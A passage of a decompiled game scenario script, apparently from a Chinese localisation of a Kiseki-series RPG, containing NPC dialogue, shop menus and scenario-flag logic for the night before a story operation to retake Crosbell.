scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_26E6") Menu( 0, -1, -1, 1, ( "对话\x01", # 0 "编组队伍\x01", # 1 "放弃\x01", # 2 ) ) MenuEnd(0x0) OP_60(0x0) Switch( (scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_END)), (0, "loc_2637"), (1, "loc_26BB"), (SWITCH_DEFAULT, "loc_26D7"), ) label("loc_2637") ChrTalk( 0x8, ( "#12100F在明天的作战中……\x01", "我们会在梅尔卡瓦上\x01", "专心为你们提供后援支持。\x02\x03", "而你们则要潜入市内,\x01", "所以最好趁现在\x01", "做好充分准备。\x02", ) ) CloseMessageWindow() Jump("loc_26E1") label("loc_26BB") OP_32(0xFF, 0xF9, 0x0) PartySelect(0) Fade(500) OP_0D() RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_26E1") label("loc_26D7") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_26E1") Jump("loc_25F0") label("loc_26E6") TalkEnd(0xFE) Return() # Function_13_24BA end def Function_14_26EA(): pass label("Function_14_26EA") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x68), scpexpr(EXPR_PUSH_LONG, 0x16), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_2799") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_270D") Call(0, 25) Jump("loc_2794") label("loc_270D") ChrTalk( 0xC, ( "#01900F罗伊德警官,请你一定要认真\x01", "倾听姐姐的愿望哦。\x02\x03", "#01909F呵呵,真期待结果呢~\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F(唔……芙兰为什么\x01", " 这么兴奋……)\x02", ) ) CloseMessageWindow() label("loc_2794") Jump("loc_280C") label("loc_2799") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_27AB") Call(0, 10) Jump("loc_280C") label("loc_27AB") ChrTalk( 0xC, ( "#01902F罗伊德警官,\x01", "明天一定要加油哦~\x02\x03", "#01909F我也会通过姐姐\x01", "来补充能量,\x01", "做好万全准备的!\x02", ) ) CloseMessageWindow() label("loc_280C") TalkEnd(0xFE) Return() # Function_14_26EA end def Function_15_2810(): pass label("Function_15_2810") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_2B36") ChrTalk( 0x9, ( "#02300F在你们明天潜入克洛斯贝尔市的\x01", "同时,我们也会在梅尔卡瓦上\x01", "发动网络入侵。\x02\x03", "#02303F总之,你们就多加努力,\x01", "在市内闹个天翻地覆吧。\x02\x03", "#02302F只要在市内造成混乱,\x01", "应该就会出现能成功\x01", "侵入导力网络的机会。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00004F嗯,我们一起加油,\x01", "努力完成各自的任务吧。\x02\x03", "#00001F……话说回来,约纳……\x01", "你今晚该不会是准备\x01", "熬一通宵吧?(盯视)\x02", ) ) 
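# Annotation (added, hedged): Function_15_2810 here and Functions 16/17 below appear to follow
# the usual field-talk pattern of these scripts: a scenario flag (0x1DB bit 3, 4 or 5
# respectively) gates the long first conversation, and once it has been set only the shorter
# repeat lines at the later label are shown.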
CloseMessageWindow() ChrTalk( 0x9, ( "#02305F……呃!\x02\x03", "#02309F这、这个嘛……\x01", "虽然准备工作已经做得差不多了,\x01", "但我毕竟是夜行生物嘛。\x02\x03", "#02304F而且,与其明明睡不着\x01", "却硬要去睡,也许还是\x01", "通宵之后的精神状态更好呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F我说你啊……\x01", "明天的作战可是一场持久战,\x01", "你要是通宵,说不定会撑不下来的。\x02\x03", "#00001F既然准备工作已经快完成了,\x01", "你就尽早去休息吧。\x01", "肯定还是休息之后的精神状态更好。\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#02306F好啦好啦,我知道了。\x02\x03", "#02300F手头的事情告一段落之后,我就会收工\x01", "去休息的,你不要一直盯着我嘛。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DB, 3) Jump("loc_2BBA") label("loc_2B36") ChrTalk( 0x9, ( "#02300F明天的网络入侵行动的\x01", "准备工作就快完成了。\x02\x03", "#02306F手头事情告一段落之后,我就会收工\x01", "去休息的,你不要动不动就过来盯梢啊。\x02", ) ) CloseMessageWindow() label("loc_2BBA") TalkEnd(0xFE) Return() # Function_15_2810 end def Function_16_2BBE(): pass label("Function_16_2BBE") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_2EE0") ChrTalk( 0x12, ( "#02103F对现有体制持有异议的人们\x01", "集结在一起,抱着拼死的觉悟而\x01", "发动『解放克洛斯贝尔市作战』……\x02\x03", "#02101F如果这次的作战以失败而告终,\x01", "世人恐怕就会得出『总统才是正确的』\x01", "这种结论。\x02\x03", "#02103F就像卡尔瓦德一样,在过去的\x01", "民主化过程中所策动的种种阴谋,\x01", "如今都已被解释为正当合法的行为了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F……是啊。\x02\x03", "#00001F甚至可以说……\x01", "是非成败,全都取决于明天的结果。\x01", "我非常明白这一点。\x02", ) ) CloseMessageWindow() ChrTalk( 0x12, ( "#02109F哈哈哈,其实我并没打算\x01", "给你施加压力。\x02\x03", "#02103F……作为一名记者,我的义务\x01", "是亲眼见证克洛斯贝尔的命运,\x01", "并将其传达给大众。\x02\x03", "#02100F不过,抛开新闻工作者这层身份,\x01", "我更希望站在一名普通人的立场上\x01", "来支持你们。\x02\x03", "#02104F为你们这个继承了盖伊先生的意志\x01", "而诞生的特别任务支援科加油呐喊。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00002F格蕾丝小姐……\x02", ) CloseMessageWindow() ChrTalk( 0x12, ( "#02109F呵呵,为了小琪雅……\x01", "你们明天一定要拼尽全力哦!\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00000F嗯,放心吧!\x02", ) CloseMessageWindow() SetScenarioFlags(0x1DB, 4) Jump("loc_2F63") label("loc_2EE0") ChrTalk( 0x12, ( "#02100F抛开新闻工作者这层身份,\x01", "我更希望站在一名普通人的立场上\x01", "来支持你们。\x02\x03", "#02109F为了小琪雅……\x01", "你们明天一定要拼尽全力哦!\x02", ) ) CloseMessageWindow() label("loc_2F63") TalkEnd(0xFE) Return() # Function_16_2BBE end def Function_17_2F67(): pass label("Function_17_2F67") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_31CB") ChrTalk( 0x11, ( "#02503F……明天恐怕将会是\x01", "十分艰辛的一天。\x02\x03", "#02500F竟然让你们这些年轻人\x01", "来背负『自治州的命运』\x01", "这个沉重负担。\x02\x03", "#02503F身为自治州的代表之一……\x01", "我要向你们表示歉意。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F……请您不要\x01", "这么说。\x02\x03", "#00000F麦克道尔议长,您已经\x01", "完成了发表『独立无效宣言』\x01", "这个重要的职责。\x02\x03", "#00004F至于接下来的事情,\x01", "就必须要由我们这些\x01", "战斗人员来亲手解决了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x11, ( "#02503F……真不好意思,\x01", "实在是辛苦你们了。\x02\x03", "#02500F既然如此,我就以你们一定能够\x01", "在『解放作战』中取得胜利为前提,\x01", "继续考虑今后的对策吧。\x02\x03", "#02503F这也是为了让陷入混乱的克洛斯贝尔\x01", "居民们尽早恢复到正常生活之中。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00000F好……那就拜托您了。\x02", ) CloseMessageWindow() SetScenarioFlags(0x1DB, 5) Jump("loc_323F") label("loc_31CB") ChrTalk( 0x11, ( "#02503F我就以你们一定能够\x01", "在『解放作战』中取得胜利为前提,\x01", "继续考虑今后的对策吧。\x02\x03", "#02500F……愿女神保佑你们。\x02", ) ) CloseMessageWindow() label("loc_323F") TalkEnd(0xFE) Return() # Function_17_2F67 end def Function_18_3243(): pass label("Function_18_3243") Call(0, 19) Return() # Function_18_3243 end def Function_19_3247(): pass label("Function_19_3247") TalkBegin(0x14) RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) 
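# Annotation (added, hedged): Function_19_3247 appears to drive a shop NPC (chr 0x14). The loop
# starting at loc_3254 below re-shows a menu whose options are 对话 / 购买装备 / 购买消耗品 / 放弃
# (Talk / Buy equipment / Buy consumables / Cancel); RunExpression(0x0, 0x63) seems to prime the
# loop sentinel, and the Jc chain over flags 0x1A1-0x1A7 apparently selects which OP_AF shop
# table (0xD2-0xD8) to open depending on story progress.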
label("loc_3254") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3515") FadeToDark(300, 0, 100) Menu( 0, -1, -1, 1, ( "对话\x01", # 0 "购买装备\x01", # 1 "购买消耗品\x01", # 2 "放弃\x01", # 3 ) ) MenuEnd(0x0) Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_32B3") OP_60(0x0) FadeToBright(300, 0) OP_0D() label("loc_32B3") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3333") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_END)), "loc_32D2") OP_AF(0xD8) Jump("loc_3324") label("loc_32D2") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A4, 1)), scpexpr(EXPR_END)), "loc_32E2") OP_AF(0xD7) Jump("loc_3324") label("loc_32E2") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A3, 3)), scpexpr(EXPR_END)), "loc_32F2") OP_AF(0xD6) Jump("loc_3324") label("loc_32F2") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A2, 7)), scpexpr(EXPR_END)), "loc_3302") OP_AF(0xD5) Jump("loc_3324") label("loc_3302") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A1, 7)), scpexpr(EXPR_END)), "loc_3312") OP_AF(0xD4) Jump("loc_3324") label("loc_3312") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A1, 2)), scpexpr(EXPR_END)), "loc_3322") OP_AF(0xD3) Jump("loc_3324") label("loc_3322") OP_AF(0xD2) label("loc_3324") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_3510") label("loc_3333") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3353") OP_AF(0xDC) RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_3510") label("loc_3353") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_3367") Jump("loc_3510") label("loc_3367") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3510") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_346C") ChrTalk( 0x14, ( "我也很清楚,\x01", "如今的状况实在\x01", "是不容乐观……\x02", ) ) CloseMessageWindow() ChrTalk( 0x14, ( "不过,警察、教会、警备队、黑月……\x01", "甚至连『神狼』和『银』都\x01", "站在了我们这边。\x02", ) ) CloseMessageWindow() ChrTalk( 0x14, ( "集结了这么多的伙伴,\x01", "让我不禁开始觉得,无论面对什么\x01", "挑战,我们都可以顺利取得成功。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x0, 2) Jump("loc_3510") label("loc_346C") ChrTalk( 0x14, ( "警察、教会、警备队、黑月……\x01", "甚至连『神狼』和『银』都\x01", "站在了我们这边。\x02", ) ) CloseMessageWindow() ChrTalk( 0x14, ( "集结了这么多的伙伴,\x01", "让我不禁开始觉得,无论面对什么\x01", "挑战,我们都可以顺利取得成功。\x02", ) ) CloseMessageWindow() label("loc_3510") Jump("loc_3254") label("loc_3515") TalkEnd(0x14) Return() # Function_19_3247 end def Function_20_3519(): pass label("Function_20_3519") Call(0, 21) Return() # Function_20_3519 end def Function_21_351D(): pass label("Function_21_351D") TalkBegin(0x15) RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_352A") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_36FC") FadeToDark(300, 0, 100) Menu( 0, -1, -1, 1, ( "对话\x01", # 0 "改造·合成\x01", # 1 "放弃\x01", # 2 ) ) MenuEnd(0x0) Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_NEQ), 
scpexpr(EXPR_END)), "loc_3580") OP_60(0x0) FadeToBright(300, 0) OP_0D() label("loc_3580") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_35A0") OP_AF(0xDD) RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_36F7") label("loc_35A0") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_35B4") Jump("loc_36F7") label("loc_35B4") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_36F7") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_3687") ChrTalk( 0x15, ( "在明天的作战中,\x01", "最大的问题显然还是\x01", "那三架『神机』。\x02", ) ) CloseMessageWindow() ChrTalk( 0x15, ( "想办法击退那些『神机』,\x01", "正是潜入市内的关键。\x02", ) ) CloseMessageWindow() ChrTalk( 0x15, ( "我们到时会和各方势力联手作战,\x01", "无论如何都要取得成功。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x0, 3) Jump("loc_36F7") label("loc_3687") ChrTalk( 0x15, ( "想办法击退那三架『神机』,\x01", "正是潜入市内的关键。\x02", ) ) CloseMessageWindow() ChrTalk( 0x15, ( "我们到时会和各方势力联手作战,\x01", "无论如何都要取得成功。\x02", ) ) CloseMessageWindow() label("loc_36F7") Jump("loc_352A") label("loc_36FC") TalkEnd(0x15) Return() # Function_21_351D end def Function_22_3700(): pass label("Function_22_3700") EventBegin(0x0) Fade(500) OP_68(100420, 1000, -101760, 0) MoveCamera(47, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(15480, 0) SetChrPos(0x101, 100110, 0, -101660, 180) SetChrSubChip(0x10, 0x2) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_3BB1") ChrTalk( 0x10, ( "#12P#00106F解放克洛斯贝尔市作战……\x01", "明天就要正式开始了。\x02\x03", "#00108F如果能见到贝尔和迪塔叔叔,我一定要问出\x01", "他们策动这一系列事件的真正目的……\x01", "而且还要尽力说服他们。\x02\x03", "#00101F可是,如果无法说服成功……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00006F#5P……对立恐怕就是不可避免的了。\x02", ) CloseMessageWindow() ChrTalk( 0x10, ( "#12P#00103F嗯……我早已\x01", "有所觉悟了。\x02\x03", "#00108F为了报答那些不顾自身安危,\x01", "向我们伸出援手的人们……\x02\x03", "#00101F更为了夺回小琪雅,\x01", "我们是绝对\x01", "不能输的。\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0xFFFF) Sleep(500) ChrTalk( 0x101, ( "#00004F#5P……艾莉。\x02\x03", "#00000F你不必将这一切都扛在自己肩上。\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, "#12P#00105F哎……\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F#5P不管是迪塔先生还是玛丽亚贝尔小姐,\x01", "对我们而言,也都是很亲近的熟人。\x02\x03", "#00001F所以说,这份重担并不是只属于你一个人的,\x01", "应该由我们大家一起来背负。\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, "#12P#00108F罗伊德……\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#00002F……明天一起加油吧,艾莉,\x01", "我和大家都会陪在你身边的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, ( "#12P#00104F……呵呵,嗯。\x02\x03", "#00102F谢谢,罗伊德。\x01", "多亏你的劝慰,我感觉轻松了一些。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00009F#5P哈哈……不用客气。\x02", ) CloseMessageWindow() OP_63(0x10, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0x10) Sleep(500) ChrTalk( 0x10, ( "#12P#00106F(……那、那个,罗伊德。)\x02\x03", "#00112F(做完准备工作之后,\x01", " 你可以来甲板一趟吗?)\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00005F#5P(哎……?)\x02", ) CloseMessageWindow() ChrTalk( 0x10, ( "#12P#00113F(如果方便……\x01", " 我有些话,想单独和你\x01", " 谈一谈……)\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 5) Jump("loc_3C2C") label("loc_3BB1") ChrTalk( 0x10, ( "#12P#00112F(做完准备工作之后,\x01", " 你可以来甲板一趟吗?)\x02\x03", "#00113F(如果方便……\x01", " 我有些话,想单独和你\x01", " 谈一谈……)\x02", ) ) 
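# Annotation (added, hedged): Functions 22 through 26 look like variations of one template: a
# party member invites Lloyd to the Merkabah's deck, an accept/decline menu follows (here
# "接受艾莉的邀请" / "拒绝" = accept Elie's invitation / decline), and accepting calls the shared
# helper via Call(0, 27) and then sets one of the promise flags 0x1AA bit 3-7 (Elie, Tio, Randy,
# Noel, Wazy respectively, judging by the dialogue).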
CloseMessageWindow() label("loc_3C2C") Menu( 0, -1, -1, 0, ( "接受艾莉的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3CDE") ChrTalk( 0x101, ( "#00002F#5P(……知道了,\x01", " 我稍后就会过去的。)\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, ( "#12P#00109F(……呵呵,谢谢,\x01", " 那我们就待会再见吧。)\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 3) Jump("loc_3D98") label("loc_3CDE") ChrTalk( 0x10, ( "#12P#00106F(……是吗。)\x02\x03", "#00102F(呵呵,不必在意,\x01", " 其实也不是什么大不了的事情。)\x02\x03", "#00104F(不过,如果你改变主意了,\x01", " 就再来和我说一声吧。)\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00000F#5P(好的,我会的。)\x02", ) CloseMessageWindow() OP_5A() label("loc_3D98") SetChrSubChip(0x10, 0x0) EventEnd(0x5) Return() # Function_22_3700 end def Function_23_3D9F(): pass label("Function_23_3D9F") EventBegin(0x0) Fade(500) OP_68(-3160, -500, 6480, 0) MoveCamera(52, 29, 0, 0) OP_6E(500, 0) SetCameraDistance(16170, 0) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 6)), scpexpr(EXPR_END)), "loc_3DE1") SetChrSubChip(0xB, 0x1) label("loc_3DE1") SetChrPos(0x101, -3610, -1500, 5780, 0) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4250") ChrTalk( 0xB, ( "#11P#00203F(快速敲击键盘……)\x02\x03", "#00200F嗯,这样就准备得差不多了吧。\x02", ) ) CloseMessageWindow() OP_63(0xB, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(2000) OP_64(0xB) ChrTalk( 0xB, ( "#11P#00208F(咔嚓)\x02\x03", "#00203F……………………………………\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00005F缇欧……\x01", "你在做什么呢?\x02", ) ) CloseMessageWindow() OP_63(0xB, 0x0, 1700, 0x26, 0x26, 0xFA, 0x1) Sleep(1000) SetChrSubChip(0xB, 0x1) ChrTalk( 0xB, ( "#5P#00202F为了明天的突入行动,\x01", "我正在对梅尔卡瓦的系统\x01", "做最终检查。\x02\x03", "#00203F我到时也会离开梅尔卡瓦,\x01", "和大家一起作战……\x02\x03", "#00200F所以控制通讯终端之后的网络侵入\x01", "工作要交给约纳和芙兰来处理,\x01", "现在就要完成交接。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00003F这样啊……\x01", "真是辛苦你了。\x02\x03", "#00000F我能帮上什么忙吗?\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#5P#00203F……不,没什么。\x02\x03", "#00202F这些都是我擅长的工作,\x01", "而且还有约纳协助,人手足够了。\x02\x03", "#00204F罗伊德前辈只要摆出一副\x01", "队长的架势,威严地站在边上\x01", "看着就可以了。\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#12P#00006F那可不行啊,为了明天的作战,\x01", "还有好多事情需要准备呢。\x02\x03", "#00000F既然你这么有干劲,\x01", "这里就全部交给你了。\x02", ) ) CloseMessageWindow() OP_63(0xB, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0xB) Sleep(500) ChrTalk( 0xB, ( "#5P#00203F……对了,\x01", "我的确有件事想拜托罗伊德前辈。\x02\x03", "#00208F其实……我有点事\x01", "想和你商量。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00005F和我商量……?\x01", "你有什么烦恼吗?\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#5P#00206F……那个,在这里说话有些不方便。\x02\x03", "#00201F你忙完了手上的事情之后,\x01", "可以来梅尔卡瓦的\x01", "甲板吗?\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 6) ClearChrFlags(0xB, 0x10) Jump("loc_42C0") label("loc_4250") ChrTalk( 0xB, ( "#5P#00206F其实……我有点事\x01", "想和罗伊德前辈商量。\x02\x03", "#00201F你忙完了手上的事情之后,\x01", "可以来梅尔卡瓦的\x01", "甲板吗?\x02", ) ) CloseMessageWindow() label("loc_42C0") Menu( 0, -1, -1, 0, ( "接受缇欧的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_4352") ChrTalk( 0x101, ( "#12P#00002F知道了,\x01", "我很愿意陪你商量。\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#5P#00209F呵呵……\x01", "那就拜托了。\x02", ) ) CloseMessageWindow() 
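# Annotation (added, hedged): Call(0, 27) below invokes Function_27_5B69, defined later in this
# file. That helper seems to check whether a different promise flag (0x1AA bit 3-7 or 0x1AB bit
# 0) is already set and, if so, plays the "apologize and cancel the earlier promise" message and
# clears it before this branch records the new promise with SetScenarioFlags(0x1AA, 4).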
OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 4) Jump("loc_43D9") label("loc_4352") ChrTalk( 0xB, ( "#5P#00204F……这样啊。\x01", "算了,这也没办法。\x02\x03", "#00202F如果愿意和我商量事情了,\x01", "就再来和我说一声吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#12P#00000F好的,我知道了。\x02", ) OP_5A() CloseMessageWindow() label("loc_43D9") SetChrSubChip(0xB, 0x0) EventEnd(0x5) Return() # Function_23_3D9F end def Function_24_43E0(): pass label("Function_24_43E0") EventBegin(0x0) Fade(500) OP_68(98200, 1000, 600, 0) MoveCamera(45, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(16090, 0) SetChrPos(0x101, 97510, 0, -530, 0) SetChrSubChip(0xE, 0x2) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_488C") ChrTalk( 0xE, "#5P#00300F哟,罗伊德。\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00000F兰迪,你们正在\x01", "检修武器吧?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00302F嗯,毕竟明天的作战可以算是\x01", "我们至今为止要面对的最大难关。\x02\x03", "#00304F有可能会用到『狂战士』,\x01", "为了预防万一,现在必须要\x01", "认真做好准备。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00005F唔,至今为止总是很忙,\x01", "一直都没时间维护武器……\x02\x03", "#00003F我是不是也应该趁着今晚,\x01", "好好检查一下旋棍呢?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00309F嗯,还是检查一下吧。\x02\x03", "#00303F虽说你的武器和来复枪不同,\x01", "不需要特别检修\x01", "精密部件……\x02\x03", "#00300F但就算只是擦拭一下,\x01", "手感也会有很大改善。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#12P#00009F哈哈,说得也是。\x02\x03", "#00005F话说回来,兰迪……\x01", "没想到你的心思还挺慎密的。\x02\x03", "#00000F不光是那把来复枪,\x01", "你好像连斧枪都会\x01", "坚持每天检查吧?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00302F嗯,检查武器可是\x01", "基础中的基础啊。\x02\x03", "#00304F一定要像对待绝世美女那样,\x01", "小心翼翼地温柔处理。\x02\x03", "#00300F不然的话,\x01", "说不定会在战场上\x01", "突然出现故障……\x02", ) ) CloseMessageWindow() OP_63(0xE, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0) Sleep(1500) OP_64(0xE) ChrTalk( 0x101, ( "#12P#00011F……抱歉,我是不是\x01", "让你回想起了不愉快的往事?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00309F……哈哈,这有什么好道歉的。\x02\x03", "#00306F……嗯,话说回来……\x02\x03", "#00308F我差不多……也该把那些\x01", "事情告诉你了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#12P#00005F哎……?\x02", ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00300F你待会要是有空,\x01", "能不能来梅尔卡瓦的甲板一趟?\x02\x03", "我想让你\x01", "陪我聊聊。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 7) Jump("loc_48DE") label("loc_488C") ChrTalk( 0xE, ( "#5P#00300F你待会要是有空,\x01", "能不能来梅尔卡瓦的甲板一趟?\x02\x03", "我想让你\x01", "陪我聊聊。\x02", ) ) CloseMessageWindow() label("loc_48DE") Menu( 0, -1, -1, 0, ( "接受兰迪的邀请\x01", # 0 "拒绝\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_49A7") ChrTalk( 0x101, ( "#12P#00002F……我知道了,\x01", "稍后就会过去。\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#5P#00309F哈哈,那我们就待会再见吧。\x02\x03", "#00302F等我检修完这东西之后,\x01", 